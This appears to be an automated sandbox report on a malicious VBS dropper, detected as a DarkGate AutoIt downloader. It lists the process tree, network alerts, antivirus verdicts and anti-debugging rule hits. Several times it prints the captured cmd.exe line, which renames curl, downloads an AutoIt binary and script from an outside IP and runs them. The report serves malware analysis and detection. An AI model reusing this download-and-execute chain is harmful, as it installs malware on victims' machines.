Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 26, 2023, 6:06 p.m. | Sept. 26, 2023, 6:08 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\neverban_FFNTdW.vbs
2556-
cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
2748
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
66.42.63.27 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 66.42.63.27:2351 -> 192.168.56.101:49161 | 2048098 | ET MALWARE DarkGate AutoIt Downloader | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
cmdline | "C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3 |
wmi | Select * from Win32_Process |
Avast | Script:SNH-gen [Trj] |
Kaspersky | HEUR:Trojan.VBS.SAgent.gen |
ZoneAlarm | HEUR:Trojan.VBS.SAgent.gen |
AVG | Script:SNH-gen [Trj] |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3 |
cmdline | cmd /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3 |
host | 66.42.63.27 |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3 | ||||||
parent_process | wscript.exe | martian_process | cmd /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3 |
file | C:\Windows\System32\cmd.exe |